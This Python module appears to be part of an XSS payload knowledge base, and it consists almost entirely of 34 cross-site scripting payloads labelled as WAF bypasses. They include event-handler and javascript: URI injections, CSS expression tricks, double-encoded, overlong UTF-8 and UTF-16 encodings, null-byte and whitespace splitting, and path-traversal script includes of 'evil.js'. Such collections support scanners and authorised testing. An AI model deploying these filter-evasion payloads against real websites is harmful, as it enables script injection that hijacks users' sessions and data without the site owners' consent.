#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

WAF Bypass Core Payloads - Part 2
"""

from typing import Dict

from ..models import PayloadEntry


WAF_BYPASS_CORE_PAYLOADS_PART2: Dict[str, PayloadEntry] = {
    "waf_bypass_035": PayloadEntry(
        payload='<div data-alert="alert(1)" onclick="eval(this.dataset.alert)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_036": PayloadEntry(
        payload='<span data-xss="alert(1)" onmouseover="Function(this.dataset.xss)()">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_037": PayloadEntry(
        payload='<form action="javascript:alert(1)"><input type="submit">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_038": PayloadEntry(
        payload='<form><button formaction="javascript:alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_039": PayloadEntry(
        payload='<input type="image" formaction="javascript:alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_040": PayloadEntry(
        payload='<div style="width:expression(alert(1))">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_041": PayloadEntry(
        payload='<div style="background:url(javascript:alert(1))">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_042": PayloadEntry(
        payload='<div style="list-style:url(javascript:alert(1))">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_043": PayloadEntry(
        payload="%2527%253E%253Cscript%253Ealert(1)%253C/script%253E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_044": PayloadEntry(
        payload="%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_045": PayloadEntry(
        payload="%E0%80%BCscript%E0%80%BEalert(1)%E0%80%BC/script%E0%80%BE",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_046": PayloadEntry(
        payload="%u003Cscript%u003Ealert(1)%u003C/script%u003E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_047": PayloadEntry(
        payload="%u0027%u003E%u003Cscript%u003Ealert(1)%u003C/script%u003E",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_048": PayloadEntry(
        payload='<iframe src="data:text/html;charset=utf-16,%FF%FE%3C%00s%00c%00r%00i%00p%00t%00%3E%00a%00l%00e%00r%00t%00(%001%00)%00%3C%00/%00s%00c%00r%00i%00p%00t%00%3E%00">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_049": PayloadEntry(
        payload="javascript:/*--></title></style></textarea></script></xmp><svg/onload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_050": PayloadEntry(
        payload="javascript:/*--></title></style></textarea></script></xmp><img/src=x onerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_051": PayloadEntry(
        payload="<body/onload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_052": PayloadEntry(
        payload="<body%20onload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_053": PayloadEntry(
        payload="<body%0aonload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_054": PayloadEntry(
        payload="<body%0donload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_055": PayloadEntry(
        payload="<body%09onload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_056": PayloadEntry(
        payload="<script>alert(1)%00</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_057": PayloadEntry(
        payload="<script%00>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_058": PayloadEntry(
        payload='<script src="../../../../../evil.js"></script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_059": PayloadEntry(
        payload='<script src="..\\..\\..\\..\\..\\evil.js"></script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_060": PayloadEntry(
        payload='<script>alert("1")</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_061": PayloadEntry(
        payload="<script>alert('1')</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_062": PayloadEntry(
        payload="<script>alert(`1`)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_063": PayloadEntry(
        payload="<script>alert(\\`1\\`)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_064": PayloadEntry(
        payload="<script>alert(0x1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_065": PayloadEntry(
        payload="<script>alert(01)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_066": PayloadEntry(
        payload="<script>alert(1.0)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_067": PayloadEntry(
        payload="<script>alert(1e0)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
    "waf_bypass_068": PayloadEntry(
        payload="<script>alert(0b1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Waf Bypass payload",
        tags=["waf-bypass", "evasion"],
        waf_evasion=True,
    ),
}
